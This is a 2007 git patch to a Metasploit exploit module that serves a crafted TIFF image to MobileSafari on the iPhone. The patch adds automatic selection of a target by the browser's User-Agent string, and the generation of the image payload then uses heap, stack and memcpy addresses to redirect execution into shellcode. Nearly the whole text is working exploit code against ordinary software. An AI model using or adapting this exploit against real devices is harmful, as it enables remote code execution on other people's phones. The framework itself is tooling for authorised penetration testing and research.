From 3050615029b5eda3be1282c08dd032b07fbbffea Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 15 Oct 2007 21:00:10 +0000
Subject: [PATCH] Automatic targetting

git-svn-id: file:///home/svn/framework3/trunk@5147 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/osx/armle/safari_libtiff.rb | 33 +++++++++++++++-----
 1 file changed, 26 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/osx/armle/safari_libtiff.rb b/modules/exploits/osx/armle/safari_libtiff.rb
index db5c564197..5880bf2c26 100644
--- a/modules/exploits/osx/armle/safari_libtiff.rb
+++ b/modules/exploits/osx/armle/safari_libtiff.rb
@@ -58,6 +58,14 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 				},
 			'Targets'        =>
 				[
+					[ 'MobileSafari iPhone Mac OS X Automatic', 
+						{
+							'Platform'  => 'osx',
+							'Arch'      => ARCH_ARMLE,
+							'Automatic' => true
+						}
+					],
+									
 					[ 'MobileSafari iPhone Mac OS X armle (1.00, 1.01, 1.02)', 
 						{
 							'Platform' => 'osx',
@@ -77,25 +85,36 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 						}
 					],																					
 				],
+			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Aug 01 2006'
 			))
 	end
 
-	def on_request_uri(cli, request)
+	def on_request_uri(cli, req)
 	
 		# Re-generate the payload
 		return if ((p = regenerate_payload(cli)) == nil)
 
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+		t = target
+		if(target['Automatic'])
+		
+			t = self.targets[1]
+			case req.headers['User-Agent']
+			when /iPhone.*420\.1/
+				t = self.targets[2]
+			end
+		end
+
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} #{t.name}...")
 
 		# Transmit the compressed response to the client
-		send_response(cli, generate_tiff(p), { 'Content-Type' => 'image/tiff' })
+		send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
 		
 		# Handle the payload
 		handler(cli)
 	end
 
-	def generate_tiff(code)
+	def generate_tiff(code, targ)
 
 		path = File.join(Msf::Config.install_root, "data", "exploits", "iphone_libtiff.bin")
 
@@ -115,8 +134,8 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 		# return back to the heap location we copied the stack to.
 		#
 
-		dst_ptr = target['Heap']
-		src_ptr = target['Stack']
+		dst_ptr = targ['Heap']
+		src_ptr = targ['Stack']
 		shl_len = 168 + payload.encoded.length
 				
 		# Still some wonky characters in here, this doesn't work with alpha/english/etc
@@ -127,7 +146,7 @@ class Exploits::Osx::Armle::SafariLibTIFF < Msf::Exploit::Remote
 	
 
 		# memcpy(r0, r1, r2)
-		patt[140,4] = [target['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
+		patt[140,4] = [targ['Memcpy']].pack("V") # memcpy @ 0x3009a1bc
 		patt[124,4] = [dst_ptr].pack("V")    # dst
 		patt[128,4] = [src_ptr].pack("V")    # src
 		patt[132,4] = [shl_len].pack("V")    # len